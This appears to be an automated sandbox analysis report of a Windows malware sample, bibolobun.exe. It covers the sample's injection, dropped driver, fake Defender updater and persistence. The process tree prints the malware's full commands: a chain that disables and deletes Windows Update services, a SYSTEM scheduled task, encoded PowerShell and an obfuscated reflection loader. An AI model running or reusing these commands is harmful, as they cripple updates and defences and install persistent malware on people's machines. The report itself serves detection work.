bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494

Analysis

max time kernel
151s
max time network
150s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
30-08-2022 08:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bibolobun.exe
Size

5.1MB
MD5

2438b851e157a3f70bd48af1984b2139
SHA1

105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256

bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512

ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
SSDEEP

98304:hoJgPPz4jnKiw6qbse0KZ3U/TUpm9OMtUdvHW4i/6jUH2+9Nx40u:onKl6qgeUoSOdPZi/GUH2QX40u

Score

10^/10

discovery evasion exploit persistence

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 1532 created 416 1532 powershell.EXE winlogon.exe
PID 1468 created 416 1468 powershell.EXE winlogon.exe

description	pid	process	target process
PID 1532 created 416	1532	powershell.EXE	winlogon.exe
PID 1468 created 416	1468	powershell.EXE	winlogon.exe

Drops file in Drivers directory 2 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

Executes dropped EXE 3 IoCs

Processes:

conhost.exeupdate.exedialer.exe

pid process

1552 conhost.exe
1220 update.exe
1616 dialer.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1020 takeown.exe
2032 icacls.exe
2012 takeown.exe
1904 icacls.exe

pid	process
1552	conhost.exe
1220	update.exe
1616	dialer.exe

pid	process
1020	takeown.exe
2032	icacls.exe
2012	takeown.exe
1904	icacls.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

services.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Program Files\\Google\\Libs\\WR64.sys"	services.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

2012 cmd.exe
Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

1892 taskeng.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

2032 icacls.exe
2012 takeown.exe
1904 icacls.exe
1020 takeown.exe

pid	process
2012	cmd.exe

pid	process
1892	taskeng.exe

pid	process
2032	icacls.exe
2012	takeown.exe
1904	icacls.exe
1020	takeown.exe

Drops file in System32 directory 6 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exesvchost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\WindowsDefender	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\C717.tmp	conhost.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

conhost.exepowershell.EXEpowershell.EXEconhost.exe

description	pid	process	target process
PID 304 set thread context of 1552	304	conhost.exe	conhost.exe
PID 1532 set thread context of 1020	1532	powershell.EXE	dllhost.exe
PID 1468 set thread context of 1120	1468	powershell.EXE	dllhost.exe
PID 1900 set thread context of 1616	1900	conhost.exe	dialer.exe

Drops file in Program Files directory 3 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File created	C:\Program Files\Google\Libs\WR64.sys	conhost.exe
File created	C:\Program Files\Platform\Defender\update.exe	conhost.exe
File opened for modification	C:\Program Files\Platform\Defender\update.exe	conhost.exe

Drops file in Windows directory 6 IoCs

Processes:

svchost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1120 sc.exe
1812 sc.exe
268 sc.exe
892 sc.exe
1992 sc.exe
664 sc.exe
820 sc.exe
1288 sc.exe
1692 sc.exe
1724 sc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1212 schtasks.exe
1068 schtasks.exe

pid	process
1120	sc.exe
1812	sc.exe
268	sc.exe
892	sc.exe
1992	sc.exe
664	sc.exe
820	sc.exe
1288	sc.exe
1692	sc.exe
1724	sc.exe

pid	process
1212	schtasks.exe
1068	schtasks.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

powershell.EXEconhost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d0aade5258bcd801	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	conhost.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1488	reg.exe
976	reg.exe
1928	reg.exe
1068	reg.exe
1228	reg.exe
1288	reg.exe
1356	reg.exe
304	reg.exe
676	reg.exe
584	reg.exe
1100	reg.exe
1772	reg.exe
1412	reg.exe
380	reg.exe
940	reg.exe
112	reg.exe
1160	reg.exe
1664	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.execonhost.exepowershell.EXEdllhost.exepowershell.EXEdllhost.exepowershell.exe

pid	process
1900	powershell.exe
304	conhost.exe
1532	powershell.EXE
1532	powershell.EXE
1020	dllhost.exe
1020	dllhost.exe
1020	dllhost.exe
1020	dllhost.exe
1468	powershell.EXE
1020	dllhost.exe
1020	dllhost.exe
1020	dllhost.exe
1020	dllhost.exe
1468	powershell.EXE
1120	dllhost.exe
1120	dllhost.exe
1120	dllhost.exe
1120	dllhost.exe
1020	dllhost.exe
1020	dllhost.exe
1120	dllhost.exe
1120	dllhost.exe
1020	dllhost.exe
1020	dllhost.exe
1120	dllhost.exe
1120	dllhost.exe
1020	dllhost.exe
1020	dllhost.exe
1120	dllhost.exe
1120	dllhost.exe
1020	dllhost.exe
1020	dllhost.exe
1120	dllhost.exe
1120	dllhost.exe
1020	dllhost.exe
1020	dllhost.exe
1488	powershell.exe
1120	dllhost.exe
1120	dllhost.exe
1020	dllhost.exe
1020	dllhost.exe
1120	dllhost.exe
1120	dllhost.exe
1020	dllhost.exe
1020	dllhost.exe
1120	dllhost.exe
1120	dllhost.exe
1020	dllhost.exe
1020	dllhost.exe
1120	dllhost.exe
1120	dllhost.exe
1020	dllhost.exe
1020	dllhost.exe
1120	dllhost.exe
1120	dllhost.exe
1020	dllhost.exe
1020	dllhost.exe
1120	dllhost.exe
1120	dllhost.exe
1020	dllhost.exe
1020	dllhost.exe
1120	dllhost.exe
1120	dllhost.exe
1020	dllhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

services.exe

pid process

460 services.exe

pid	process
460	services.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.execonhost.exepowershell.EXEdllhost.exepowershell.EXEdllhost.exesvchost.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	1900	powershell.exe
Token: SeShutdownPrivilege	2044	powercfg.exe
Token: SeShutdownPrivilege	1760	powercfg.exe
Token: SeShutdownPrivilege	1732	powercfg.exe
Token: SeShutdownPrivilege	1064	powercfg.exe
Token: SeTakeOwnershipPrivilege	1020	takeown.exe
Token: SeDebugPrivilege	304	conhost.exe
Token: SeDebugPrivilege	1532	powershell.EXE
Token: SeDebugPrivilege	1532	powershell.EXE
Token: SeDebugPrivilege	1020	dllhost.exe
Token: SeDebugPrivilege	1468	powershell.EXE
Token: SeDebugPrivilege	1468	powershell.EXE
Token: SeDebugPrivilege	1120	dllhost.exe
Token: SeAuditPrivilege	872	svchost.exe
Token: SeDebugPrivilege	1488	powershell.exe
Token: SeShutdownPrivilege	1360	powercfg.exe
Token: SeShutdownPrivilege	1220	powercfg.exe
Token: SeShutdownPrivilege	1588	powercfg.exe
Token: SeShutdownPrivilege	556	powercfg.exe
Token: SeTakeOwnershipPrivilege	2012	takeown.exe
Token: SeAssignPrimaryTokenPrivilege	872	svchost.exe
Token: SeIncreaseQuotaPrivilege	872	svchost.exe
Token: SeSecurityPrivilege	872	svchost.exe
Token: SeTakeOwnershipPrivilege	872	svchost.exe
Token: SeLoadDriverPrivilege	872	svchost.exe
Token: SeSystemtimePrivilege	872	svchost.exe
Token: SeBackupPrivilege	872	svchost.exe
Token: SeRestorePrivilege	872	svchost.exe
Token: SeShutdownPrivilege	872	svchost.exe
Token: SeSystemEnvironmentPrivilege	872	svchost.exe
Token: SeUndockPrivilege	872	svchost.exe
Token: SeManageVolumePrivilege	872	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	872	svchost.exe
Token: SeIncreaseQuotaPrivilege	872	svchost.exe
Token: SeSecurityPrivilege	872	svchost.exe
Token: SeTakeOwnershipPrivilege	872	svchost.exe
Token: SeLoadDriverPrivilege	872	svchost.exe
Token: SeSystemtimePrivilege	872	svchost.exe
Token: SeBackupPrivilege	872	svchost.exe
Token: SeRestorePrivilege	872	svchost.exe
Token: SeShutdownPrivilege	872	svchost.exe
Token: SeSystemEnvironmentPrivilege	872	svchost.exe
Token: SeUndockPrivilege	872	svchost.exe
Token: SeManageVolumePrivilege	872	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	872	svchost.exe
Token: SeIncreaseQuotaPrivilege	872	svchost.exe
Token: SeSecurityPrivilege	872	svchost.exe
Token: SeTakeOwnershipPrivilege	872	svchost.exe
Token: SeLoadDriverPrivilege	872	svchost.exe
Token: SeSystemtimePrivilege	872	svchost.exe
Token: SeBackupPrivilege	872	svchost.exe
Token: SeRestorePrivilege	872	svchost.exe
Token: SeShutdownPrivilege	872	svchost.exe
Token: SeSystemEnvironmentPrivilege	872	svchost.exe
Token: SeUndockPrivilege	872	svchost.exe
Token: SeManageVolumePrivilege	872	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	872	svchost.exe
Token: SeIncreaseQuotaPrivilege	872	svchost.exe
Token: SeSecurityPrivilege	872	svchost.exe
Token: SeTakeOwnershipPrivilege	872	svchost.exe
Token: SeLoadDriverPrivilege	872	svchost.exe
Token: SeSystemtimePrivilege	872	svchost.exe
Token: SeBackupPrivilege	872	svchost.exe
Token: SeRestorePrivilege	872	svchost.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

Explorer.EXE

pid process

1420 Explorer.EXE
1420 Explorer.EXE
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

Explorer.EXE

pid process

1420 Explorer.EXE
1420 Explorer.EXE
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

conhost.exe

pid process

1468 conhost.exe

pid	process
1420	Explorer.EXE
1420	Explorer.EXE

pid	process
1420	Explorer.EXE
1420	Explorer.EXE

pid	process
1468	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

bibolobun.execonhost.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1492 wrote to memory of 304	1492	bibolobun.exe	conhost.exe
PID 1492 wrote to memory of 304	1492	bibolobun.exe	conhost.exe
PID 1492 wrote to memory of 304	1492	bibolobun.exe	conhost.exe
PID 1492 wrote to memory of 304	1492	bibolobun.exe	conhost.exe
PID 304 wrote to memory of 1900	304	conhost.exe	powershell.exe
PID 304 wrote to memory of 1900	304	conhost.exe	powershell.exe
PID 304 wrote to memory of 1900	304	conhost.exe	powershell.exe
PID 304 wrote to memory of 1376	304	conhost.exe	cmd.exe
PID 304 wrote to memory of 1376	304	conhost.exe	cmd.exe
PID 304 wrote to memory of 1376	304	conhost.exe	cmd.exe
PID 304 wrote to memory of 1636	304	conhost.exe	cmd.exe
PID 304 wrote to memory of 1636	304	conhost.exe	cmd.exe
PID 304 wrote to memory of 1636	304	conhost.exe	cmd.exe
PID 1376 wrote to memory of 664	1376	cmd.exe	sc.exe
PID 1376 wrote to memory of 664	1376	cmd.exe	sc.exe
PID 1376 wrote to memory of 664	1376	cmd.exe	sc.exe
PID 1636 wrote to memory of 2044	1636	cmd.exe	powercfg.exe
PID 1636 wrote to memory of 2044	1636	cmd.exe	powercfg.exe
PID 1636 wrote to memory of 2044	1636	cmd.exe	powercfg.exe
PID 1376 wrote to memory of 1120	1376	cmd.exe	sc.exe
PID 1376 wrote to memory of 1120	1376	cmd.exe	sc.exe
PID 1376 wrote to memory of 1120	1376	cmd.exe	sc.exe
PID 304 wrote to memory of 588	304	conhost.exe	cmd.exe
PID 304 wrote to memory of 588	304	conhost.exe	cmd.exe
PID 304 wrote to memory of 588	304	conhost.exe	cmd.exe
PID 1376 wrote to memory of 1812	1376	cmd.exe	sc.exe
PID 1376 wrote to memory of 1812	1376	cmd.exe	sc.exe
PID 1376 wrote to memory of 1812	1376	cmd.exe	sc.exe
PID 1636 wrote to memory of 1760	1636	cmd.exe	powercfg.exe
PID 1636 wrote to memory of 1760	1636	cmd.exe	powercfg.exe
PID 1636 wrote to memory of 1760	1636	cmd.exe	powercfg.exe
PID 1376 wrote to memory of 1724	1376	cmd.exe	sc.exe
PID 1376 wrote to memory of 1724	1376	cmd.exe	sc.exe
PID 1376 wrote to memory of 1724	1376	cmd.exe	sc.exe
PID 588 wrote to memory of 1212	588	cmd.exe	schtasks.exe
PID 588 wrote to memory of 1212	588	cmd.exe	schtasks.exe
PID 588 wrote to memory of 1212	588	cmd.exe	schtasks.exe
PID 1636 wrote to memory of 1732	1636	cmd.exe	powercfg.exe
PID 1636 wrote to memory of 1732	1636	cmd.exe	powercfg.exe
PID 1636 wrote to memory of 1732	1636	cmd.exe	powercfg.exe
PID 1376 wrote to memory of 268	1376	cmd.exe	sc.exe
PID 1376 wrote to memory of 268	1376	cmd.exe	sc.exe
PID 1376 wrote to memory of 268	1376	cmd.exe	sc.exe
PID 1376 wrote to memory of 380	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 380	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 380	1376	cmd.exe	reg.exe
PID 1636 wrote to memory of 1064	1636	cmd.exe	powercfg.exe
PID 1636 wrote to memory of 1064	1636	cmd.exe	powercfg.exe
PID 1636 wrote to memory of 1064	1636	cmd.exe	powercfg.exe
PID 1376 wrote to memory of 1228	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 1228	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 1228	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 1488	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 1488	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 1488	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 1664	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 1664	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 1664	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 676	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 676	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 676	1376	cmd.exe	reg.exe
PID 1376 wrote to memory of 1020	1376	cmd.exe	takeown.exe
PID 1376 wrote to memory of 1020	1376	cmd.exe	takeown.exe
PID 1376 wrote to memory of 1020	1376	cmd.exe	takeown.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:476

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
PID:460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1032

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:1676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:1512

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1260

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:872

C:\Windows\system32\taskeng.exe
taskeng.exe {ED8EEDD5-C421-46A5-BBB1-FD6FC5100929} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
- Loads dropped DLL
PID:1892

C:\Program Files\Platform\Defender\update.exe
"C:\Program Files\Platform\Defender\update.exe"
4⤵
- Executes dropped EXE
PID:1220

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Program Files\Platform\Defender\update.exe"
5⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:1668

C:\Windows\system32\sc.exe
sc stop UsoSvc
7⤵
- Launches sc.exe
PID:820

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
7⤵
- Launches sc.exe
PID:1288

C:\Windows\system32\sc.exe
sc stop wuauserv
7⤵
- Launches sc.exe
PID:892

C:\Windows\system32\sc.exe
sc stop bits
7⤵
- Launches sc.exe
PID:1692

C:\Windows\system32\sc.exe
sc stop dosvc
7⤵
- Launches sc.exe
PID:1992

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
7⤵
- Modifies registry key
PID:1288

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
7⤵
- Modifies registry key
PID:1928

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
7⤵
- Modifies registry key
PID:1100

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
7⤵
- Modifies registry key
PID:1772

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
7⤵
- Modifies registry key
PID:1068

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2012

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1904

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:1160

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:1412

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:1356

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:304

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
7⤵
PID:1476

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
7⤵
PID:1904

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
7⤵
PID:468

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
7⤵
PID:1876

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
7⤵
PID:1992

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
7⤵
PID:1360

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
7⤵
PID:1700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
6⤵
PID:1804

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1360

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1220

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1588

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:556

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""
6⤵
PID:584

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""
7⤵
- Creates scheduled task(s)
PID:1068

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe "epzggvhm"
6⤵
PID:996

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe zryhtmslhfgrpc1 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvtFmxXu9Su4ZmZ4m248qJKzYqn0Ua9E3eZCF6KVDnl4Om3mtJYdu2zYxf5VDSOtlwzNI2HELjSSWiBbhmq9nnQLcymNaMLbX6BcVfekXBXlHwtkdZ87kGHVBeHkhms/rlEKec4HZ9wIBVrc9Qi+y2+a3lep8HRZlmoXu5C0nH5vK2Z6XqFAlqh1P1TH9zlUlrSoi8iC8XAKUbdPgbva/qi9DzYr1RVc8QqRoXX8h4GvBaNJoiMytDP1XZ+7BxVOZddNH0XJdiGTlhqmJ6roc2xDtAY0xSKzjDUzaj6VcQ6dE4nGnXfnrH194gWO2Fle+qlRtL5DmSlHKlQNVMEwD+lLyH/56tXiuxnzEBOxWLJZa4aP8Qv/WXczd4ddilDeMPY13j7jZPu5TdLr9XBYda4edqFELpOQYd1Sl2t6HN/f/knReR0toj+9pfBIu/dyltFHYBgH8jIh3ZIp8xo/NopF9P+/CLEQGN4MNrl3tzSKPM88s7KlDiFV5IVDt9y2BSrs52V/tpdfNJYjkFjol69J
6⤵
- Executes dropped EXE
PID:1616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
